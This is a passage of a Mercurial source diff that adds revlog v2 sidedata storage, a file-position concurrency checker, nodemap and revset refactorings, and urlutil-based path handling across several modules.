node or self.hash(text, p1, p2) - rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata - ) + rawtext, validatehash = flagutil.processflagswrite(self, text, flags) # If the flag processor modifies the revision data, ignore any provided # cachedelta. @@ -2111,8 +2137,9 @@ ) node = node or self.hash(rawtext, p1, p2) - if self.index.has_node(node): - return node + rev = self.index.get_rev(node) + if rev is not None: + return rev if validatehash: self.checkhash(rawtext, node, p1=p1, p2=p2) @@ -2127,6 +2154,7 @@ flags, cachedelta=cachedelta, deltacomputer=deltacomputer, + sidedata=sidedata, ) def addrawrevision( @@ -2140,6 +2168,7 @@ flags, cachedelta=None, deltacomputer=None, + sidedata=None, ): """add a raw revision with known flags, node and parents useful when reusing a revision not stored in this revlog (ex: received @@ -2162,6 +2191,7 @@ ifh, dfh, deltacomputer=deltacomputer, + sidedata=sidedata, ) finally: if dfh: @@ -2237,7 +2267,9 @@ compressor = engine.revlogcompressor(self._compengineopts) self._decompressors[t] = compressor except KeyError: - raise error.RevlogError(_(b'unknown compression type %r') % t) + raise error.RevlogError( + _(b'unknown compression type %s') % binascii.hexlify(t) + ) return compressor.decompress(data) @@ -2255,6 +2287,7 @@ dfh, alwayscache=False, deltacomputer=None, + sidedata=None, ): """internal function to add revisions to the log @@ -2287,7 +2320,23 @@ curr = len(self) prev = curr - 1 - offset = self.end(prev) + + offset = self._get_data_offset(prev) + + if self._concurrencychecker: + if self._inline: + # offset is "as if" it were in the .d file, so we need to add on + # the size of the entry metadata. + self._concurrencychecker( + ifh, self.indexfile, offset + curr * self.index.entry_size + ) + else: + # Entries in the .i are a consistent size. + self._concurrencychecker( + ifh, self.indexfile, curr * self.index.entry_size + ) + self._concurrencychecker(dfh, self.datafile, offset) + p1r, p2r = self.rev(p1), self.rev(p2) # full versions are inserted when the needed deltas @@ -2309,6 +2358,16 @@ deltainfo = deltacomputer.finddeltainfo(revinfo, fh) + if sidedata: + serialized_sidedata = sidedatautil.serialize_sidedata(sidedata) + sidedata_offset = offset + deltainfo.deltalen + else: + serialized_sidedata = b"" + # Don't store the offset if the sidedata is empty, that way + # we can easily detect empty sidedata and they will be no different + # than ones we manually add. + sidedata_offset = 0 + e = ( offset_type(offset, flags), deltainfo.deltalen, @@ -2318,12 +2377,24 @@ p1r, p2r, node, + sidedata_offset, + len(serialized_sidedata), ) + + if self.version & 0xFFFF != REVLOGV2: + e = e[:8] + self.index.append(e) - entry = self._io.packentry(e, self.node, self.version, curr) self._writeentry( - transaction, ifh, dfh, entry, deltainfo.data, link, offset + transaction, + ifh, + dfh, + entry, + deltainfo.data, + link, + offset, + serialized_sidedata, ) rawtext = btext[0] @@ -2334,9 +2405,31 @@ if type(rawtext) == bytes: # only accept immutable objects self._revisioncache = (node, curr, rawtext) self._chainbasecache[curr] = deltainfo.chainbase - return node - - def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset): + return curr + + def _get_data_offset(self, prev): + """Returns the current offset in the (in-transaction) data file. + Versions < 2 of the revlog can get this 0(1), revlog v2 needs a docket + file to store that information: since sidedata can be rewritten to the + end of the data file within a transaction, you can have cases where, for + example, rev `n` does not have sidedata while rev `n - 1` does, leading + to `n - 1`'s sidedata being written after `n`'s data. + + TODO cache this in a docket file before getting out of experimental.""" + if self.version & 0xFFFF != REVLOGV2: + return self.end(prev) + + offset = 0 + for rev, entry in enumerate(self.index): + sidedata_end = entry[8] + entry[9] + # Sidedata for a previous rev has potentially been written after + # this rev's end, so take the max. + offset = max(self.end(rev), offset, sidedata_end) + return offset + + def _writeentry( + self, transaction, ifh, dfh, entry, data, link, offset, sidedata + ): # Files opened in a+ mode have inconsistent behavior on various # platforms. Windows requires that a file positioning call be made # when the file handle transitions between reads and writes. See @@ -2360,13 +2453,17 @@ if data[0]: dfh.write(data[0]) dfh.write(data[1]) + if sidedata: + dfh.write(sidedata) ifh.write(entry) else: - offset += curr * self._io.size + offset += curr * self.index.entry_size transaction.add(self.indexfile, offset) ifh.write(entry) ifh.write(data[0]) ifh.write(data[1]) + if sidedata: + ifh.write(sidedata) self._enforceinlinesize(transaction, ifh) nodemaputil.setup_persistent_nodemap(transaction, self) @@ -2375,6 +2472,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -2397,7 +2495,7 @@ if r: end = self.end(r - 1) ifh = self._indexfp(b"a+") - isize = r * self._io.size + isize = r * self.index.entry_size if self._inline: transaction.add(self.indexfile, end + isize) dfh = None @@ -2418,15 +2516,16 @@ deltacomputer = deltautil.deltacomputer(self) # loop through our set of deltas for data in deltas: - node, p1, p2, linknode, deltabase, delta, flags = data + node, p1, p2, linknode, deltabase, delta, flags, sidedata = data link = linkmapper(linknode) flags = flags or REVIDX_DEFAULT_FLAGS - if self.index.has_node(node): + rev = self.index.get_rev(node) + if rev is not None: # this can happen if two branches make the same change - self._nodeduplicatecallback(transaction, node) + self._nodeduplicatecallback(transaction, rev) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, rev) empty = False continue @@ -2464,7 +2563,7 @@ # We're only using addgroup() in the context of changegroup # generation so the revision data can always be handled as raw # by the flagprocessor. - self._addrevision( + rev = self._addrevision( node, None, transaction, @@ -2475,12 +2574,13 @@ (baserev, delta), ifh, dfh, - alwayscache=bool(addrevisioncb), + alwayscache=alwayscache, deltacomputer=deltacomputer, + sidedata=sidedata, ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False if not dfh and not self._inline: @@ -2551,9 +2651,9 @@ end = self.start(rev) if not self._inline: transaction.add(self.datafile, end) - end = rev * self._io.size + end = rev * self.index.entry_size else: - end += rev * self._io.size + end += rev * self.index.entry_size transaction.add(self.indexfile, end) @@ -2592,7 +2692,7 @@ f.seek(0, io.SEEK_END) actual = f.tell() f.close() - s = self._io.size + s = self.index.entry_size i = max(0, actual // s) di = actual - (i * s) if self._inline: @@ -2621,6 +2721,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -2649,6 +2750,7 @@ deltamode=deltamode, revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, + sidedata_helpers=sidedata_helpers, ) DELTAREUSEALWAYS = b'always' @@ -3087,3 +3189,54 @@ ) return d + + def rewrite_sidedata(self, helpers, startrev, endrev): + if self.version & 0xFFFF != REVLOGV2: + return + # inline are not yet supported because they suffer from an issue when + # rewriting them (since it's not an append-only operation). + # See issue6485. + assert not self._inline + if not helpers[1] and not helpers[2]: + # Nothing to generate or remove + return + + new_entries = [] + # append the new sidedata + with self._datafp(b'a+') as fp: + # Maybe this bug still exists, see revlog._writeentry + fp.seek(0, os.SEEK_END) + current_offset = fp.tell() + for rev in range(startrev, endrev + 1): + entry = self.index[rev] + new_sidedata = storageutil.run_sidedata_helpers( + store=self, + sidedata_helpers=helpers, + sidedata={}, + rev=rev, + ) + + serialized_sidedata = sidedatautil.serialize_sidedata( + new_sidedata + ) + if entry[8] != 0 or entry[9] != 0: + # rewriting entries that already have sidedata is not + # supported yet, because it introduces garbage data in the + # revlog. + msg = b"Rewriting existing sidedata is not supported yet" + raise error.Abort(msg) + entry = entry[:8] + entry += (current_offset, len(serialized_sidedata)) + + fp.write(serialized_sidedata) + new_entries.append(entry) + current_offset += len(serialized_sidedata) + + # rewrite the new index entries + with self._indexfp(b'w+') as fp: + fp.seek(startrev * self.index.entry_size) + for i, entry in enumerate(new_entries): + rev = startrev + i + self.index.replace_sidedata_info(rev, entry[8], entry[9]) + packed = self._io.packentry(entry, self.node, self.version, rev) + fp.write(packed) diff --git a/mercurial/revlogutils/concurrency_checker.py b/mercurial/revlogutils/concurrency_checker.py new file mode 100644 --- /dev/null +++ b/mercurial/revlogutils/concurrency_checker.py @@ -0,0 +1,38 @@ +from ..i18n import _ +from .. import error + + +def get_checker(ui, revlog_name=b'changelog'): + """Get a function that checks file handle position is as expected. + + This is used to ensure that files haven't been modified outside of our + knowledge (such as on a networked filesystem, if `hg debuglocks` was used, + or writes to .hg that ignored locks happened). + + Due to revlogs supporting a concept of buffered, delayed, or diverted + writes, we're allowing the files to be shorter than expected (the data may + not have been written yet), but they can't be longer. + + Please note that this check is not perfect; it can't detect all cases (there + may be false-negatives/false-OKs), but it should never claim there's an + issue when there isn't (false-positives/false-failures). + """ + + vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name) + # Avoid any `fh.tell` cost if this isn't enabled. + if not vpos or vpos not in [b'log', b'warn', b'fail']: + return None + + def _checker(fh, fn, expected): + if fh.tell() <= expected: + return + + msg = _(b'%s: file cursor at position %d, expected %d') + # Always log if we're going to warn or fail. + ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected) + if vpos == b'warn': + ui.warn((msg + b'\n') % (fn, fh.tell(), expected)) + elif vpos == b'fail': + raise error.RevlogError(msg % (fn, fh.tell(), expected)) + + return _checker diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -1,6 +1,6 @@ # revlogdeltas.py - constant used for revlog logic # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the @@ -9,14 +9,21 @@ from __future__ import absolute_import +import struct + from ..interfaces import repository -# revlog header flags +### main revlog header + +INDEX_HEADER = struct.Struct(b">I") + +## revlog version REVLOGV0 = 0 REVLOGV1 = 1 # Dummy value until file format is finalized. -# Reminder: change the bounds check in revlog.__init__ when this is changed. REVLOGV2 = 0xDEAD + +## global revlog header flags # Shared across v1 and v2. FLAG_INLINE_DATA = 1 << 16 # Only used by v1, implied by v2. @@ -27,6 +34,46 @@ REVLOGV1_FLAGS = FLAG_INLINE_DATA | FLAG_GENERALDELTA REVLOGV2_FLAGS = FLAG_INLINE_DATA +### individual entry + +## index v0: +# 4 bytes: offset +# 4 bytes: compressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 20 bytes: parent 1 nodeid +# 20 bytes: parent 2 nodeid +# 20 bytes: nodeid +INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s") + +## index v1 +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x") +assert INDEX_ENTRY_V1.size == 32 * 2 + +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +# 8 bytes: sidedata offset +# 4 bytes: sidedata compressed length +# 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) +INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQi20x") +assert INDEX_ENTRY_V2.size == 32 * 3 + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the diff --git a/mercurial/revlogutils/deltas.py b/mercurial/revlogutils/deltas.py --- a/mercurial/revlogutils/deltas.py +++ b/mercurial/revlogutils/deltas.py @@ -1,6 +1,6 @@ # revlogdeltas.py - Logic around delta computation for revlog # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/revlogutils/flagutil.py b/mercurial/revlogutils/flagutil.py --- a/mercurial/revlogutils/flagutil.py +++ b/mercurial/revlogutils/flagutil.py @@ -84,7 +84,7 @@ flagprocessors[flag] = processor -def processflagswrite(revlog, text, flags, sidedata): +def processflagswrite(revlog, text, flags): """Inspect revision data flags and applies write transformations defined by registered flag processors. @@ -100,9 +100,12 @@ processed text and ``validatehash`` is a bool indicating whether the returned text should be checked for hash integrity. """ - return _processflagsfunc(revlog, text, flags, b'write', sidedata=sidedata)[ - :2 - ] + return _processflagsfunc( + revlog, + text, + flags, + b'write', + )[:2] def processflagsread(revlog, text, flags): @@ -145,14 +148,14 @@ return _processflagsfunc(revlog, text, flags, b'raw')[1] -def _processflagsfunc(revlog, text, flags, operation, sidedata=None): +def _processflagsfunc(revlog, text, flags, operation): """internal function to process flag on a revlog This function is private to this module, code should never needs to call it directly.""" # fast path: no flag processors will run if flags == 0: - return text, True, {} + return text, True if operation not in (b'read', b'write', b'raw'): raise error.ProgrammingError(_(b"invalid '%s' operation") % operation) # Check all flags are known. @@ -168,7 +171,6 @@ if operation == b'write': orderedflags = reversed(orderedflags) - outsidedata = {} for flag in orderedflags: # If a flagprocessor has been registered for a known flag, apply the # related operation transform and update result tuple. @@ -186,10 +188,9 @@ if operation == b'raw': vhash = rawtransform(revlog, text) elif operation == b'read': - text, vhash, s = readtransform(revlog, text) - outsidedata.update(s) + text, vhash = readtransform(revlog, text) else: # write operation - text, vhash = writetransform(revlog, text, sidedata) + text, vhash = writetransform(revlog, text) validatehash = validatehash and vhash - return text, validatehash, outsidedata + return text, validatehash diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -53,7 +53,11 @@ try: with revlog.opener(filename) as fd: if use_mmap: - data = util.buffer(util.mmapread(fd, data_length)) + try: + data = util.buffer(util.mmapread(fd, data_length)) + except ValueError: + # raised when the read file is too small + data = b'' else: data = fd.read(data_length) except (IOError, OSError) as e: @@ -81,9 +85,9 @@ if tr.hasfinalize(callback_id): return # no need to register again tr.addpending( - callback_id, lambda tr: _persist_nodemap(tr, revlog, pending=True) + callback_id, lambda tr: persist_nodemap(tr, revlog, pending=True) ) - tr.addfinalize(callback_id, lambda tr: _persist_nodemap(tr, revlog)) + tr.addfinalize(callback_id, lambda tr: persist_nodemap(tr, revlog)) class _NoTransaction(object): @@ -123,20 +127,33 @@ return # we do not use persistent_nodemap on this revlog notr = _NoTransaction() - _persist_nodemap(notr, revlog) + persist_nodemap(notr, revlog) for k in sorted(notr._postclose): notr._postclose[k](None) -def _persist_nodemap(tr, revlog, pending=False): +def delete_nodemap(tr, repo, revlog): + """ Delete nodemap data on disk for a given revlog""" + if revlog.nodemap_file is None: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) + repo.svfs.unlink(revlog.nodemap_file) + + +def persist_nodemap(tr, revlog, pending=False, force=False): """Write nodemap data on disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): raise error.ProgrammingError( "cannot persist nodemap of a filtered changelog" ) if revlog.nodemap_file is None: - msg = "calling persist nodemap on a revlog without the feature enableb" - raise error.ProgrammingError(msg) + if force: + revlog.nodemap_file = get_nodemap_file( + revlog.opener, revlog.indexfile + ) + else: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) can_incremental = util.safehasattr(revlog.index, "nodemap_data_incremental") ondisk_docket = revlog._nodemap_docket @@ -634,3 +651,14 @@ if isinstance(entry, dict): return _find_node(entry, node[1:]) return entry + + +def get_nodemap_file(opener, indexfile): + if indexfile.endswith(b'.a'): + pending_path = indexfile[:-4] + b".n.a" + if opener.exists(pending_path): + return pending_path + else: + return indexfile[:-4] + b".n" + else: + return indexfile[:-2] + b".n" diff --git a/mercurial/revlogutils/sidedata.py b/mercurial/revlogutils/sidedata.py --- a/mercurial/revlogutils/sidedata.py +++ b/mercurial/revlogutils/sidedata.py @@ -13,9 +13,8 @@ The current implementation is experimental and subject to changes. Do not rely on it in production. -Sidedata are stored in the revlog itself, within the revision rawtext. They -are inserted and removed from it using the flagprocessors mechanism. The following -format is currently used:: +Sidedata are stored in the revlog itself, thanks to a new version of the +revlog. The following format is currently used:: initial header: <number of sidedata; 2 bytes> @@ -60,48 +59,35 @@ SIDEDATA_ENTRY = struct.Struct('>HL20s') -def sidedatawriteprocessor(rl, text, sidedata): +def serialize_sidedata(sidedata): sidedata = list(sidedata.items()) sidedata.sort() - rawtext = [SIDEDATA_HEADER.pack(len(sidedata))] + buf = [SIDEDATA_HEADER.pack(len(sidedata))] for key, value in sidedata: digest = hashutil.sha1(value).digest() - rawtext.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) + buf.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) for key, value in sidedata: - rawtext.append(value) - rawtext.append(bytes(text)) - return b''.join(rawtext), False + buf.append(value) + buf = b''.join(buf) + return buf -def sidedatareadprocessor(rl, text): +def deserialize_sidedata(blob): sidedata = {} offset = 0 - (nbentry,) = SIDEDATA_HEADER.unpack(text[: SIDEDATA_HEADER.size]) + (nbentry,) = SIDEDATA_HEADER.unpack(blob[: SIDEDATA_HEADER.size]) offset += SIDEDATA_HEADER.size dataoffset = SIDEDATA_HEADER.size + (SIDEDATA_ENTRY.size * nbentry) for i in range(nbentry): nextoffset = offset + SIDEDATA_ENTRY.size - key, size, storeddigest = SIDEDATA_ENTRY.unpack(text[offset:nextoffset]) + key, size, storeddigest = SIDEDATA_ENTRY.unpack(blob[offset:nextoffset]) offset = nextoffset # read the data associated with that entry nextdataoffset = dataoffset + size - entrytext = text[dataoffset:nextdataoffset] + entrytext = bytes(blob[dataoffset:nextdataoffset]) readdigest = hashutil.sha1(entrytext).digest() if storeddigest != readdigest: raise error.SidedataHashError(key, storeddigest, readdigest) sidedata[key] = entrytext dataoffset = nextdataoffset - text = text[dataoffset:] - return text, True, sidedata - - -def sidedatarawprocessor(rl, text): - # side data modifies rawtext and prevent rawtext hash validation - return False - - -processors = ( - sidedatareadprocessor, - sidedatawriteprocessor, - sidedatarawprocessor, -) + return sidedata diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1,6 +1,6 @@ # revset.py - revision set queries for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -41,6 +41,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) # helpers for processing parsed tree @@ -1335,6 +1336,29 @@ return subset & rs +@predicate(b'nodefromfile(path)') +def nodefromfile(repo, subset, x): + """ + An alias for ``::.`` (ancestors of the working directory's first parent). + If file pattern is specified, the histories of files matching given + pattern in the revision given by startrev are followed, including copies. + """ + path = getstring(x, _(b"nodefromfile require a file path")) + listed_rev = set() + try: + with pycompat.open(path, 'rb') as f: + for line in f: + n = line.strip() + rn = _node(repo, n) + if rn is not None: + listed_rev.add(rn) + except IOError as exc: + m = _(b'cannot open nodes file "%s": %s') + m %= (path, encoding.strtolocal(exc.strerror)) + raise error.Abort(m) + return subset & baseset(listed_rev) + + @predicate(b'all()', safe=True) def getall(repo, subset, x): """All changesets, the same as ``0:tip``.""" @@ -1697,13 +1721,9 @@ return subset & names -@predicate(b'id(string)', safe=True) -def node_(repo, subset, x): - """Revision non-ambiguously specified by the given hex string prefix.""" - # i18n: "id" is a keyword - l = getargs(x, 1, 1, _(b"id requires one argument")) - # i18n: "id" is a keyword - n = getstring(l[0], _(b"id requires a string")) +def _node(repo, n): + """process a node input""" + rn = None if len(n) == 40: try: rn = repo.changelog.rev(bin(n)) @@ -1712,7 +1732,6 @@ except (LookupError, TypeError): rn = None else: - rn = None try: pm = scmutil.resolvehexnodeidprefix(repo, n) if pm is not None: @@ -1721,6 +1740,17 @@ pass except error.WdirUnsupported: rn = wdirrev + return rn + + +@predicate(b'id(string)', safe=True) +def node_(repo, subset, x): + """Revision non-ambiguously specified by the given hex string prefix.""" + # i18n: "id" is a keyword + l = getargs(x, 1, 1, _(b"id requires one argument")) + # i18n: "id" is a keyword + n = getstring(l[0], _(b"id requires a string")) + rn = _node(repo, n) if rn is None: return baseset() @@ -1825,27 +1855,28 @@ dest = ( l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) - if not dest: - # ui.paths.getpath() explicitly tests for None, not just a boolean - dest = None - path = repo.ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = path.branch, [] - - revs, checkout = hg.addbranchrevs(repo, repo, branches, []) - if revs: - revs = [repo.lookup(rev) for rev in revs] - other = hg.peer(repo, {}, dest) - repo.ui.pushbuffer() - outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) - repo.ui.popbuffer() + if dest: + dests = [dest] + else: + dests = [] + missing = set() + for path in urlutil.get_push_paths(repo, repo.ui, dests): + dest = path.pushloc or path.loc + branches = path.branch, [] + + revs, checkout = hg.addbranchrevs(repo, repo, branches, []) + if revs: + revs = [repo.lookup(rev) for rev in revs] + other = hg.peer(repo, {}, dest) + try: + repo.ui.pushbuffer() + outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) + repo.ui.popbuffer() + finally: + other.close() + missing.update(outgoing.missing) cl = repo.changelog - o = {cl.rev(r) for r in outgoing.missing} + o = {cl.rev(r) for r in missing} return subset & o @@ -2089,8 +2120,11 @@ if len(l) > 1: # i18n: "remote" is a keyword dest = getstring(l[1], _(b"remote requires a repository path")) - dest = repo.ui.expandpath(dest or b'default') - dest, branches = hg.parseurl(dest) + if not dest: + dest = b'default' + dest, branches = urlutil.get_unique_pull_path( + b'remote', repo, repo.ui, dest + ) other = hg.peer(repo, {}, dest) n = other.lookup(q) diff --git a/mercurial/revsetlang.py b/mercurial/revsetlang.py --- a/mercurial/revsetlang.py +++ b/mercurial/revsetlang.py @@ -1,6 +1,6 @@ # revsetlang.py - parser, tokenizer and utility for revision set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -1,6 +1,6 @@ # scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -181,17 +181,6 @@ encoding.strtolocal(inst.strerror), ) ) - except error.OutOfBandError as inst: - detailed_exit_code = 100 - if inst.args: - msg = _(b"abort: remote error:\n") - else: - msg = _(b"abort: remote error\n") - ui.error(msg) - if inst.args: - ui.error(b''.join(inst.args)) - if inst.hint: - ui.error(b'(%s)\n' % inst.hint) except error.RepoError as inst: ui.error(_(b"abort: %s\n") % inst) if inst.hint: @@ -201,7 +190,9 @@ msg = inst.args[1] if isinstance(msg, type(u'')): msg = pycompat.sysbytes(msg) - if not isinstance(msg, bytes): + if msg is None: + ui.error(b"\n") + elif not isinstance(msg, bytes): ui.error(b" %r\n" % (msg,)) elif not msg: ui.error(_(b" empty string\n")) @@ -229,6 +220,10 @@ detailed_exit_code = 20 elif isinstance(inst, error.ConfigError): detailed_exit_code = 30 + elif isinstance(inst, error.HookAbort): + detailed_exit_code = 40 + elif isinstance(inst, error.RemoteError): + detailed_exit_code = 100 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 elif isinstance(inst, error.CanceledError): diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -1,6 +1,6 @@ # server.py - utility and factory of server # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -22,7 +22,10 @@ util, ) -from .utils import procutil +from .utils import ( + procutil, + urlutil, +) def runservice( @@ -184,7 +187,7 @@ def _createhgwebservice(ui, repo, opts): # this way we can check if something was given in the command-line if opts.get(b'port'): - opts[b'port'] = util.getport(opts.get(b'port')) + opts[b'port'] = urlutil.getport(opts.get(b'port')) alluis = {ui} if repo: diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -286,8 +286,6 @@ ui, local, remote, - initialsamplesize=100, - fullsamplesize=200, abortwhenunrelated=True, ancestorsof=None, audit=None, @@ -315,7 +313,8 @@ ownheads = [rev for rev in cl.headrevs() if rev != nullrev] initial_head_exchange = ui.configbool(b'devel', b'discovery.exchange-heads') - + initialsamplesize = ui.configint(b'devel', b'discovery.sample-size.initial') + fullsamplesize = ui.configint(b'devel', b'discovery.sample-size') # We also ask remote about all the local heads. That set can be arbitrarily # large, so we used to limit it size to `initialsamplesize`. We no longer # do as it proved counter productive. The skipped heads could lead to a @@ -391,7 +390,7 @@ if audit is not None: audit[b'total-roundtrips'] = 1 - if cl.tip() == nullid: + if cl.tiprev() == nullrev: if srvheadhashes != [nullid]: return [nullid], True, srvheadhashes return [nullid], False, [] @@ -430,9 +429,12 @@ # full blown discovery # if the server has a limit to its arguments size, we can't grow the sample. - hard_limit_sample = remote.limitedarguments - grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample') - hard_limit_sample = hard_limit_sample and grow_sample + configbool = local.ui.configbool + grow_sample = configbool(b'devel', b'discovery.grow-sample') + grow_sample = grow_sample and not remote.limitedarguments + + dynamic_sample = configbool(b'devel', b'discovery.grow-sample.dynamic') + hard_limit_sample = not (dynamic_sample or remote.limitedarguments) randomize = ui.configbool(b'devel', b'discovery.randomize') disco = partialdiscovery( @@ -455,7 +457,7 @@ ui.debug(b"taking initial sample\n") samplefunc = disco.takefullsample targetsize = fullsamplesize - if not hard_limit_sample: + if grow_sample: fullsamplesize = int(fullsamplesize * samplegrowth) else: # use even cheaper initial sample diff --git a/mercurial/shelve.py b/mercurial/shelve.py --- a/mercurial/shelve.py +++ b/mercurial/shelve.py @@ -241,7 +241,7 @@ bin(h) for h in d[b'nodestoremove'].split(b' ') ] except (ValueError, TypeError, KeyError) as err: - raise error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) @classmethod def _getversion(cls, repo): @@ -250,7 +250,7 @@ try: version = int(fp.readline().strip()) except ValueError as err: - raise error.CorruptedState(pycompat.bytestr(err)) + raise error.CorruptedState(stringutil.forcebytestr(err)) finally: fp.close() return version @@ -534,7 +534,7 @@ parent = parents[0] origbranch = wctx.branch() - if parent.node() != nullid: + if parent.rev() != nullrev: desc = b"changes to: %s" % parent.description().split(b'\n', 1)[0] else: desc = b'(changes in empty repository)' @@ -812,7 +812,7 @@ with repo.lock(): checkparents(repo, state) ms = mergestatemod.mergestate.read(repo) - if list(ms.unresolved()): + if ms.unresolvedcount(): raise error.Abort( _(b"unresolved conflicts, can't continue"), hint=_(b"see 'hg resolve', then 'hg unshelve --continue'"), diff --git a/mercurial/similar.py b/mercurial/similar.py --- a/mercurial/similar.py +++ b/mercurial/similar.py @@ -1,6 +1,6 @@ # similar.py - mechanisms for finding similar files # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/simplemerge.py b/mercurial/simplemerge.py --- a/mercurial/simplemerge.py +++ b/mercurial/simplemerge.py @@ -19,7 +19,7 @@ from __future__ import absolute_import from .i18n import _ -from .node import nullid +from .node import nullrev from . import ( error, mdiff, @@ -402,31 +402,6 @@ return sl - def find_unconflicted(self): - """Return a list of ranges in base that are not conflicted.""" - am = mdiff.get_matching_blocks(self.basetext, self.atext) - bm = mdiff.get_matching_blocks(self.basetext, self.btext) - - unc = [] - - while am and bm: - # there is an unconflicted block at i; how long does it - # extend? until whichever one ends earlier. - a1 = am[0][0] - a2 = a1 + am[0][2] - b1 = bm[0][0] - b2 = b1 + bm[0][2] - i = intersect((a1, a2), (b1, b2)) - if i: - unc.append(i) - - if a2 < b2: - del am[0] - else: - del bm[0] - - return unc - def _verifytext(text, path, ui, opts): """verifies that text is non-binary (unless opts[text] is passed, @@ -452,7 +427,7 @@ def is_not_null(ctx): if not util.safehasattr(ctx, "node"): return False - return ctx.node() != nullid + return ctx.rev() != nullrev def _mergediff(m3, name_a, name_b, name_base): diff --git a/mercurial/smartset.py b/mercurial/smartset.py --- a/mercurial/smartset.py +++ b/mercurial/smartset.py @@ -1,6 +1,6 @@ # smartset.py - data structure for revision set # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -1,6 +1,6 @@ # sshpeer.py - ssh repository proxy class for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -24,6 +24,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -40,7 +41,7 @@ """display all data currently available on pipe as remote output. This is non blocking.""" - if pipe: + if pipe and not pipe.closed: s = procutil.readpipe(pipe) if s: display = ui.warn if warn else ui.status @@ -140,18 +141,26 @@ def close(self): return self._main.close() + @property + def closed(self): + return self._main.closed + def flush(self): return self._main.flush() -def _cleanuppipes(ui, pipei, pipeo, pipee): +def 